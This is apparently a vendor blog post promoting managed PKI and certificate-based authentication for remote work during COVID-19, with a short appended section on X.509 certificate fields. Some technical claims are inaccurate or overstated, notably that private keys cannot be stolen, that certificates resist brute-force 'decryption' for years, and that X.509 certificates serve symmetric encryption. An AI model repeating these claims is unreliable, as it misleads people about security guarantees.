To answer this question, we need to understand the findings from the survey conducted by PwC to understand the financial measures CFOs are considering during the COVID-19 global pandemic to reduce their business impact and continue sustainability. An interesting reveal from this survey is that out of all the CFOs who responded to the survey, 67% are considering cancelling or deferring planned investments to reduce the financial burden on their firms. Out of the 67%, only 2% are considering cutting planned activities in Cyber security, while the rest are not willing to slide down the budget on data protection. This clearly indicates the importance of Cyber security, especially encryption and PKI, during pandemic situations where data is spread across places, as many of the employees are working from remote locations.

What made Cyber Security especially Public Key Infrastructure (PKI) critical during COVID-19?

It is a well-known fact that Cyber Security is critical to any firm with sensitive data, even before the COVID-19 pandemic hit the globe. During the COVID-19 pandemic crisis, this aspect of cyber security became even more critical with employees handling sensitive data all over the world working remotely. This complicates the process of tracking down the sensitive data (at rest, in transit and in use) and protecting it. So, handling Public Key Infrastructure (PKI) remotely became critical for the revocation of short-lived certificates and managing the existing, live certificates. Also, managing PKI remotely is highly critical for compliance purposes as there might be huge penalties companies have to face for non-compliance to several international standards. Public Key Infrastructure (PKI) can be leveraged for protecting and performing email, VPN, user authentication, and website certificate management. PKI has become a business-critical asset during the COVID-19 global pandemic in the Cyber Security domain.

What is PKI?

PKI, or Public Key Infrastructure, is a cyber security technology framework which protects client – server communications. Certificates are used for authenticating the communication between client and server. PKI also uses X.509 certificates and public keys for providing end-to-end encryption. In this way, both server and client can ensure trust in each other and check their authenticity for proving the integrity of the transaction. With the increase in digital transformation across the globe, it is highly critical to use Public Key Infrastructure for ensuring safe and secure transactions. PKI has vast use cases across several sectors and industries, including the Medical and Finance fields.

Explore the complete information about Public Key Infrastructure here:

What are important components in Public Key Infrastructure?

There are three key components: Digital CertificatesCertificate Authority, and Registration Authority. PKI can protect the environment using the three critical components. These components play a crucial role in protecting and securing digital communications, electronic transactions.

  • Digital Certificates: Most critical component in Public Key Infrastructure (PKI) is Digital certificates. These certificates are used to validate and identify the connections between server and client. This way, the connections formed are very secure and trusted. Certificates can be created individually depending on the scale of operations. If the requirement is for a large firm, PKI digital certificates can be purchased from trusted third party issuers.
  • Certificate Authority: Certificate Authority (CA) provides authentication and safeguards trust for the certificates used by the users. Whether it might be individual computer systems or servers, Certificate Authority ensures digital identities of the users is authenticated. Digital certificates issued through certificate authorities are trusted by devices.
  • Registration Authority: Registration Authority (RA) is an approved component by Certificate Authority for issuing certificates for authenticated users based requests.  RA certificate requests ranges from individual digital certificate to sign email messages to companies planning to setup their own private certificate authority. RA sends all the approved requests to CA for certificate processing.

That should have given you a good answer to the question how does a PKI work. Now let’s learn why you should scale your PKI remotely.


Why should firms worry about scaling PKI remotely?

COVID-19 has not only created a health crisis across the globe, but it also created a havoc in the cyber space, creating a cyber pandemic as well. There has been a multi-fold increase in the number of cyber-attacks right from the start of the COVID-19 pandemic. Cyber-criminals are exploiting the current situation of remote working facilities of employees and newly deployed remote access solutions for cyber-attacks. Numbers suggest that during the initial days of the global pandemic, there was an increase of 33% in the volume of cyber-attacks. Recent attacks on one of the largest gas pipeline and Meat supplier suggest that even major firms with huge infrastructures are no exception for these attacks.

Why use PKI?

There are several good traditional cyber security mechanisms, such as multi-factor authentication and password-based protection, implemented for securing sensitive data remotely, but these techniques are no longer fool proof with cyber criminals easily manipulating the aforementioned mechanisms and breaching secured walls. Cybercriminals are able to breach these techniques, so many cyber security research organizations are suggesting to move away from these approaches. Leveraging Public Key Infrastructure to implement certificate-based authentication provides better enhanced security for sensitive data when compared to the traditional approaches.

How can you leverage Public Key Infrastructure (PKI) remotely?

Public Key Infrastructure (PKI) can provide better and stronger security standards when compared with password-based protection or multi-factor authentication, which are often in use for protecting sensitive data. As several research firms, like Forrester and Gartner say, it is always preferred to go with a “Zero Trust Security Model” to reduce the risk of exposing your business and employees. PKI can be one of the most important layers in achieving a “Zero Trust” strategy. There are three critical steps that can be followed by your organization to scale Public Key Infrastructure remotely to protect data spread across different locations:

  1. PKI certificate-based authentication can be used to replace traditional password-based protection.
  2. PKI certificate authentication can be used to replace traditional multi-factor authentication.
  3. Automation of identity certificate management can also be implemented.

PKI Certificate based authentication vs Password based protection

As per the “Data Breach Investigations 2019 report by Verizon”, 62% of breaches are caused by either phishing, stolen credentials, or brute force. From this research data, we can deduce that the majority of data breaches involved password leakage either willingly or by accident or they were done through hacking techniques, such as brute force attacks, which makes this protection technique more vulnerable.

On the other hand, PKI-based user identity certificates used in certificate-based authentication can be considered one of the strongest forms of identity authentication. This also eases the process for employees, as they are not required to remember and update passwords frequently. In certificate-based authentication, digital certificates are used for user authentication.

Reasons why PKI based authentication is better:

  • Private Key is used for authentication which can always reside in the client environment.
  • Private Key/Certificates cannot be stolen in-transit or at-rest (in server repositories).
  • Unlike passwords, digital certificates can take several years to decrypt using brute force attacks.
  • There is no requirement to remember or frequently change digital certificates like passwords.

PKI certificate authentication vs Traditional multi factor authentication

It is a known fact that multi factor authentication, either via hardware token device or mobile SMS/call-based authentication, will provide additional security when compared to only using password-based protection. Unfortunately, this is a cumbersome process for employees as there are extra steps involved in going through the authentication cycle. PKI certificate-based authentication will help in eliminating this extra step and still be able to provide stronger data security.

Advantages of using PKI certificate authentication over traditional multi factor authentication are:

  • Employees need not worry about carrying and securing extra hardware tokens or devices for additional security.
  • Extra step of entering secure token ID or One time password (OTP) can be avoided.
  • Connected devices can be trusted and authenticated.
  • Using PKI certificate authentication, you can achieve several use cases for multiple entities such as users, machines and devices (mobile).
  • Using PKI, you can satisfy multiple use cases such as user authentication, machine authentication, windows logon, accessing corporate emails, VPN access to name a few.

Automation of identity certificate management

The final step in scaling PKI remotely is to automate the process of certificate management. This will reduce the burden on IT staff by eliminating the intensive process of certificate deployment, renewal, and revocation. This will help in quickly replacing or revoking certificates by IT staff.

Benefits of automating certificate lifecycle:

  • Certificate discovery: Performing discover activity to identify certificates in use across the business landscape.
  • Certificate Deployment: Automated issuance of certificates and installation.
  • Certificate Review: Automatically renew the certificates wherever necessary and revoke them if expired.

Encryption Consulting’s Managed PKI’s

Encryption Consulting LLC (EC) will completely offload the Public Key Infrastructure environment, which means EC will take care of building the PKI infrastructure to lead and manage the PKI environment (on-premises, PKI in the cloud, cloud-based hybrid PKI infrastructure) of your organization.

Encryption Consulting will deploy and support your PKI using a fully developed and tested set of procedures and audited processes. Admin rights to your Active Directory will not be required and control over your PKI and its associated business processes will always remain with you. Furthermore, for security reasons the CA keys will be held in FIPS 140-2 Level 3 HSMs hosted either in in your secure datacentre or in our Encryption Consulting datacentre in Dallas, Texas.

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download
X.509 standard and certificate

X.509 is a standard used for public-key certificates or digital documents. An assigned cryptographic key pair is paired with a user, organization, website, or device.

X.509 certificate is a digital certificate that uses the X.509 Public Key Infrastructure (PKI) standard to verify the ownership of a public key. The certificate can be used for asymmetric or symmetric encryption, which can belong to a user, website, device, or an organization. An X.509 certificate contains information about the certificate’s owner and about the certificate itself. Some of the data includes:

  • Version: X.509 version applicable to the certificate, which suggests the information the certificate would include.
  • A unique serial number of the certificate
  • The algorithm used by the issuer to sign the certificate
  • Name of the Issuer (Certificate Authority)
  • Validity Period of the certificate
  • The name of the owner of the certificate
  • Public Key associated with the certificate
  • Optional extensions

About the Author

Search any posts

A collection of Encryption related products and resources that every organization should have!

Free Downloads

Datasheet of Encryption Consulting Services

Encryption Consulting is a customer focused cybersecurity firm that provides a multitude of services in all aspects of encryption for our clients.

Download